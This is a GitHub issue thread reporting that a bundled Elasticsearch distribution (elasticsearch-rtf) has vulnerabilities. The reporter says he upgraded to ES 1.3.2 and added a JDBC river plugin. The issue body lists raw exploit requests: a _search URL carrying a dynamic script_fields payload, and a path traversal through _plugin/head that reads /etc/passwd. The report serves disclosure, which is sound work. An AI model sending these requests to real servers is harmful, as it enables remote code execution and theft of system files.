### ISSUE TITLE
这个版本很多漏洞，自己升级到了ES 1.3.2

### ISSUE THREAD

**Issue by edagarli** [medcl/elasticsearch-rtf#30]
_search?source={'size":1,"query":{"filtered":{"query":{"match_all":{}}}},"script_fields":{"t":{"script":"Integer.toHexString(31415926)"}}}}&callback=json

_plugin/head/../../../../../../../../etc/passwd	

_plugin/head/../../../../../../../../etc/passwd	

_nodes/stats  _nodes/stats

**Comment by edagarli** [comment]
升级到ES 1.3.2

同时因为业务需要，我把river-jdbc（JDBC importer for Elasticsearch）for MySQL 插件加入。

https://github.com/edagarli/elasticsearch_rtf_1.3

**Comment by medcl** [comment]
1f34f588d0f5dcb863ddb6e78b01c14337024690
